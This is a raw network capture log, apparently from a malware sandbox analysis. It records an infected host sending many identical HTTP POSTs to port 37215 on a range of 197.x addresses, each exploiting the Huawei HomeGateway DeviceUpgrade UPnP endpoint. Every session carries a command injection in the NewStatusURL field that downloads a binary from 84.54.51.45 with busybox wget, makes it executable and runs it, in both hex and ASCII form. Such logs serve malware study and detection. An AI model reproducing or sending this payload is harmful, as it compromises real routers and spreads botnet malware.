                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            429192.168.2.1542764197.65.49.19637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783420086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            430192.168.2.1552336197.175.162.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783448935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            431192.168.2.1534584197.33.218.16837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783473015 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            432192.168.2.1560844197.29.117.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783509970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            433192.168.2.1555642197.77.247.14037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783526897 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            434192.168.2.1536436197.80.138.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783550978 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            435192.168.2.1548080197.128.79.18337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783582926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            436192.168.2.1558176197.190.110.10037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783628941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            437192.168.2.1543038197.125.225.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783632040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            438192.168.2.1560518197.158.147.19337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.783657074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
